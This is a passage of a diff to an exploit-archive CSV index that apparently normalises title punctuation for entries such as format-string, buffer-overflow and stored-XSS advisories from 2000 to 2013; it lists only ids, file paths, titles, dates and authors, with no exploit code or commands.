Vulnerability",2000-08-30,Timescape,windows,remote,0 20183,platforms/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 - author.file Write Vulnerability",2000-08-29,n30,cgi,remote,0 20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1_SpyNet CaptureNet 3.0.12 - Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 -20185,platforms/linux/local/20185.c,"RedHat 6 glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 -20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 -20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 -20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' Exploit for locale subsystem format string",2000-09-08,warning3,solaris,local,0 +20185,platforms/linux/local/20185.c,"RedHat 6 - glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 +20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 - /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 +20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 - LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 +20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' locale subsystem Format String Exploit",2000-09-08,warning3,solaris,local,0 20189,platforms/unix/local/20189.c,"Libc locale - Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 20190,platforms/unix/local/20190.c,"Libc locale - Exploit (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 User Supplied Format String Vulnerability",2000-09-05,IhaQueR@IRCnet,bsd,local,0 @@ -17690,7 +17684,7 @@ id,file,description,date,author,platform,type,port 20361,platforms/php/webapps/20361.py,"WordPress Plugin simplemail 1.0.6 - Stored XSS",2012-08-08,loneferret,php,webapps,0 20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20363,platforms/windows/webapps/20363.py,"surgemail 6.0a4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20364,platforms/php/webapps/20364.py,"t-dah webmail client 3.2.0-2.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0 +20364,platforms/php/webapps/20364.py,"T-dah Webmail Client 3.2.0-2.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0 20365,platforms/php/webapps/20365.py,"WordPress Plugin ThreeWP Email Reflector 1.13 - Stored XSS",2012-08-08,loneferret,php,webapps,0 20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 @@ -17711,7 +17705,7 @@ id,file,description,date,author,platform,type,port 20382,platforms/unix/local/20382.pl,"Debian 2.x_ RedHat 6.2_ IRIX 5/6_ Solaris 2.x - Mail Reply-To Field Vulnerability",2000-11-01,"Gregory Duchemin",unix,local,0 20383,platforms/windows/local/20383.txt,"Microsoft IIS 4.0 ISAPI Buffer Overflow Vulnerability",2000-11-06,"Marc Maiffret",windows,local,0 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 Executable File Parsing Vulnerability",2000-11-06,Nsfocus,windows,remote,0 -20385,platforms/linux/local/20385.sh,"RedHat restore 0.4 b15 Insecure Environment Variables Vulnerability",2000-11-04,fish,linux,local,0 +20385,platforms/linux/local/20385.sh,"RedHat restore 0.4 b15 - Insecure Environment Variables Vulnerability",2000-11-04,fish,linux,local,0 20386,platforms/hp-ux/local/20386.txt,"HP-UX 10.20 registrar Local Arbitrary File Read Vulnerability",2000-11-08,"J.A. Gutierrez",hp-ux,local,0 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution Vulnerability",2000-11-07,rpc,cgi,remote,0 20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 - Denial of Service Vulnerability",2000-11-01,"Fabio Pietrosanti",linux,dos,0 @@ -17847,7 +17841,7 @@ id,file,description,date,author,platform,type,port 20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution Vulnerability",2000-12-20,rivendell_team,cgi,remote,0 20526,platforms/unix/local/20526.c,"GTK+ 1.2.8 - Arbitrary Loadable Module Execution Vulnerability",2001-01-02,V9,unix,local,0 20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access Vulnerability",2000-12-30,isno,cgi,remote,0 -20528,platforms/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 Javascript URL Vulnerability",2001-01-01,"Georgi Guninski",windows,remote,0 +20528,platforms/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 - Javascript URL Vulnerability",2001-01-01,"Georgi Guninski",windows,remote,0 20529,platforms/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x - Directory Traversal Vulnerability (1)",2001-01-15,"Michael Smith",multiple,remote,0 20530,platforms/multiple/remote/20530.sh,"Lotus Domino Server 5.0.x - Directory Traversal Vulnerability (2)",2001-01-05,"Georgi Guninski",multiple,remote,0 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 AfpaCache/WebSphereNet.Data DoS Vulnerability",2001-01-08,"Peter Grundl",multiple,dos,0 @@ -17897,7 +17891,7 @@ id,file,description,date,author,platform,type,port 20576,platforms/php/webapps/20576.txt,"Inferno vBShout <= 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps,0 20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 Administration Denial of Service Vulnerability",2001-02-19,"J.K. Garvey",hardware,dos,0 20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Stored XSS",2012-08-17,"Shai rod",php,webapps,0 -20579,platforms/php/webapps/20579.py,"T-dah Webmail Multiple Stored XSS",2012-08-17,"Shai rod",php,webapps,0 +20579,platforms/php/webapps/20579.py,"T-dah Webmail - Multiple Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20580,platforms/php/webapps/20580.txt,"webid <= 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal Vulnerability",2001-02-05,joetesta,windows,remote,0 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow Vulnerability",2001-01-18,"Luis Miguel Silva",linux,local,0 @@ -18234,8 +18228,8 @@ id,file,description,date,author,platform,type,port 20935,platforms/cgi/remote/20935.pl,"Microburst uDirectory 2.0 - Remote Command Execution Vulnerability",2001-06-18,"Igor Dobrovitski",cgi,remote,0 20936,platforms/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow Vulnerability",2001-06-15,"Sergio Monteiro",linux,remote,0 20937,platforms/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 pmpost Symbolic Link Vulnerability",2001-06-18,IhaQueR,irix,local,0 -20938,platforms/cgi/remote/20938.txt,"DC Scripts DCShop Beta 1.0 02 File Disclosure Vulnerability (1)",2001-06-18,"Peter Helms",cgi,remote,0 -20939,platforms/cgi/remote/20939.txt,"DC Scripts DCShop Beta 1.0 02 File Disclosure Vulnerability (2)",2001-06-18,"Peter Helms",cgi,remote,0 +20938,platforms/cgi/remote/20938.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure Vulnerability (1)",2001-06-18,"Peter Helms",cgi,remote,0 +20939,platforms/cgi/remote/20939.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure Vulnerability (2)",2001-06-18,"Peter Helms",cgi,remote,0 20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x TTAWebTop.CGI Arbitrary File Viewing Vulnerability",2001-06-18,kf,cgi,remote,0 20941,platforms/freebsd/remote/20941.pl,"W3M 0.1/0.2 Malformed MIME Header Buffer Overflow Vulnerability",2001-06-19,White_E,freebsd,remote,0 20942,platforms/php/webapps/20942.html,"Booking System Pro CSRF Vulnerability",2012-08-30,DaOne,php,webapps,0 @@ -18422,7 +18416,7 @@ id,file,description,date,author,platform,type,port 21134,platforms/hardware/webapps/21134.txt,"Sitecom Home Storage Center Auth Bypass Vulnerability",2012-09-07,"Mattijs van Ommeren",hardware,webapps,0 21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 - CSRF Vulnerability",2012-09-07,"High-Tech Bridge SA",php,webapps,0 21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 SSH Default Password Security Bypass Vulnerability",2012-08-30,metasploit,linux,remote,0 -21137,platforms/multiple/remote/21137.rb,"HP SiteScope Remote Code Execution",2012-09-08,metasploit,multiple,remote,0 +21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (1)",2012-09-08,metasploit,multiple,remote,0 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload Vulnerability",2012-09-08,metasploit,php,remote,0 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",2012-09-08,metasploit,windows,local,0 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 @@ -18524,7 +18518,7 @@ id,file,description,date,author,platform,type,port 21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability",2002-01-20,jGgM,unixware,local,0 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP .Manifest Denial of Service Vulnerability",2002-01-21,mosestycoon,windows,dos,0 21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Include Vulnerability",2002-01-02,"Scott Moonen",php,webapps,0 -21242,platforms/linux/remote/21242.c,"rsync 2.3/2.4/2.5 Signed Array Index Remote Code Execution Vulnerability",2002-01-25,sorbo,linux,remote,0 +21242,platforms/linux/remote/21242.c,"rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution Vulnerability",2002-01-25,sorbo,linux,remote,0 21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector Half-Closed HTTP Request IP Address Revealing Vulnerabililty",2001-12-20,"Dave Plonka",hardware,remote,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 gunzip Race Condition Vulnerability",2002-02-08,"Larry Cashdollar",unix,local,0 21245,platforms/windows/dos/21245.c,"Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1)",2001-04-13,3APA3A,windows,dos,0 @@ -19676,7 +19670,7 @@ id,file,description,date,author,platform,type,port 22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.php SQL Injection Vulnerability",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop <= 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 -22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-11-02,"Canberk BOLAT",php,webapps,0 +22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps,0 22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,metasploit,windows,remote,0 22433,platforms/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 Excessive POST Data Buffer Overflow Vulnerability",2003-03-24,"Matthew Murphy",linux,dos,0 22434,platforms/windows/remote/22434.txt,"Sambar Server 5.x Information Disclosure Vulnerability",2003-03-27,"gregory Le Bras",windows,remote,0 @@ -19724,7 +19718,7 @@ id,file,description,date,author,platform,type,port 22476,platforms/windows/remote/22476.txt,"QuickFront 1.0 File Disclosure Vulnerability",2003-04-09,"Jan Kachlik",windows,remote,0 22477,platforms/php/webapps/22477.txt,"PHPay 2.2 - Multiple Path Disclosure Vulnerabilities",2003-04-09,"Ahmet Sabri ALPER",php,webapps,0 22478,platforms/php/webapps/22478.txt,"PHPay 2.2 - Cross-Site Scripting Vulnerability",2003-04-09,"Ahmet Sabri ALPER",php,webapps,0 -22479,platforms/linux/remote/22479.c,"PoPToP PPTP 1.0/1.1.x Negative read() Argument Remote Buffer Overflow Vulnerability",2003-04-09,"John Leach",linux,remote,0 +22479,platforms/linux/remote/22479.c,"PoPToP PPTP 1.0/1.1.x - Negative read() Argument Remote Buffer Overflow Vulnerability",2003-04-09,"John Leach",linux,remote,0 22480,platforms/hardware/remote/22480.txt,"Linksys BEFVP4 SNMP Community String Information Disclosure Vulnerability",2003-04-09,"Branson Matheson",hardware,remote,0 22481,platforms/cgi/webapps/22481.txt,"Super Guestbook 1.0 Sensitive Information Disclosure Weakness",2002-04-10,Over_G,cgi,webapps,0 22482,platforms/cgi/webapps/22482.txt,"Guestbook 4.0 Sensitive Information Disclosure Weakness",2003-04-10,Over_G,cgi,webapps,0 @@ -20218,7 +20212,7 @@ id,file,description,date,author,platform,type,port 22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,metasploit,windows,remote,0 22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 - realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-02,Xpl017Elz,unix,remote,0 23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0 -22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-06,Xpl017Elz,unix,remote,0 +22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 - realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-06,Xpl017Elz,unix,remote,0 22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 realpath() Off-By-One Buffer Overflow Vulnerability",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board SQL Injection Vulnerability",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 UDP Echo Service Memory Disclosure Vulnerability",2003-08-01,FX,hardware,dos,0 @@ -20476,7 +20470,7 @@ id,file,description,date,author,platform,type,port 23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass Vulnerability (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 - Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 -23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 +23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities (2)",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service Vulnerability",2012-12-09,"High-Tech Bridge SA",windows,dos,0 23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability",2003-10-15,"Brett Moore",windows,local,0 23256,platforms/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting Vulnerability",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps,0 @@ -20804,8 +20798,8 @@ id,file,description,date,author,platform,type,port 23588,platforms/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23589,platforms/netware/remote/23589.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - Multiple XSS Vulnerabilities",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service Vulnerability",2004-01-23,"Donato Ferrante",multiple,dos,0 -23591,platforms/windows/remote/23591.c,"RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (1)",2004-01-24,mandragore,windows,remote,0 -23592,platforms/windows/remote/23592.c,"RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (2)",2004-01-25,mslug@safechina.net,windows,remote,0 +23591,platforms/windows/remote/23591.c,"RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow Vulnerability (1)",2004-01-24,mandragore,windows,remote,0 +23592,platforms/windows/remote/23592.c,"RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow Vulnerability (2)",2004-01-25,mslug@safechina.net,windows,remote,0 23593,platforms/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 isqlplus Cross-Site Scripting Vulnerability",2004-01-24,"Rafel Ivgi The-Insider",multiple,remote,0 23594,platforms/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 @@ -20962,10 +20956,10 @@ id,file,description,date,author,platform,type,port 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",linux,dos,0 23758,platforms/windows/remote/23758.txt,"gweb http server 0.5/0.6 - Directory Traversal Vulnerability",2004-02-24,"Donato Ferrante",windows,remote,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation Vulnerability",2004-02-25,"Sebastian Krahmer",linux,local,0 -23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (1)",2004-02-26,saintjmf,windows,dos,0 -23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (2)",2004-02-26,shaun2k2,windows,dos,0 -23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (3)",2004-02-26,shaun2k2,windows,dos,0 -23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0 +23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow Vulnerability (1)",2004-02-26,saintjmf,windows,dos,0 +23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow Vulnerability (2)",2004-02-26,shaun2k2,windows,dos,0 +23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow Vulnerability (3)",2004-02-26,shaun2k2,windows,dos,0 +23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting Vulnerability",2004-02-26,Soby,hardware,remote,0 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 @@ -20984,7 +20978,7 @@ id,file,description,date,author,platform,type,port 23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 Crash PoC",2012-12-31,IndonesiaGokilTeam,windows,dos,0 23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php posthash) - SQL Injection Vulnerability",2012-12-31,"Joshua Rogers",php,webapps,0 23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar (index.php date param) Blind SQL Injection Vulnerability",2012-12-31,Red-D3v1L,php,webapps,0 -23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 +23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 index.php SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 blocker_query.php Multiple Parameter XSS",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting Vulnerability",2004-04-23,DarkBicho,php,webapps,0 @@ -21237,7 +21231,7 @@ id,file,description,date,author,platform,type,port 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0 24044,platforms/php/webapps/24044.txt,"phpLiteAdmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0 -24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0 +24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection Vulnerability",2004-04-23,JQ,php,webapps,0 24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 @@ -21614,7 +21608,7 @@ id,file,description,date,author,platform,type,port 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 -24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0 +24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools - Format String Vulnerability (1)",2013-02-06,metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,metasploit,multiple,remote,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal Vulnerability",2013-01-29,Vulnerability-Lab,php,webapps,0 @@ -21637,7 +21631,7 @@ id,file,description,date,author,platform,type,port 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection Vulnerability",2013-02-05,AkaStep,php,webapps,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 24459,platforms/linux/dos/24459.sh,"Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0 -24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-12,metasploit,windows,remote,0 +24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String Vulnerability (2)",2013-02-12,metasploit,windows,remote,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 @@ -21666,7 +21660,7 @@ id,file,description,date,author,platform,type,port 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script (index.php id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX Telnet Authorization Bypass",2013-02-14,"Paul Haas",hardware,remote,23 -24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability",2013-02-13,LiquidWorm,php,webapps,0 +24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload Vulnerability",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)",2013-02-14,"Scott Bell",windows,remote,0 24496,platforms/windows/webapps/24496.txt,"Sonicwall Scrutinizer 9.5.2 - SQL Injection Vulnerability",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 @@ -21690,7 +21684,7 @@ id,file,description,date,author,platform,type,port 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 -24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0 +24529,platforms/php/remote/24529.rb,"OpenEMR - PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0 24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0 24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 @@ -21698,7 +21692,7 @@ id,file,description,date,author,platform,type,port 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php r_id param) - SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 -24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0 +24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (2)",2013-02-25,metasploit,multiple,remote,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 @@ -22025,7 +22019,7 @@ id,file,description,date,author,platform,type,port 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,metasploit,windows,remote,0 -24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream Buffer Overflow",2013-03-22,metasploit,windows,remote,0 +24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow",2013-03-22,metasploit,windows,remote,0 24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 (filemanager.php) - Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 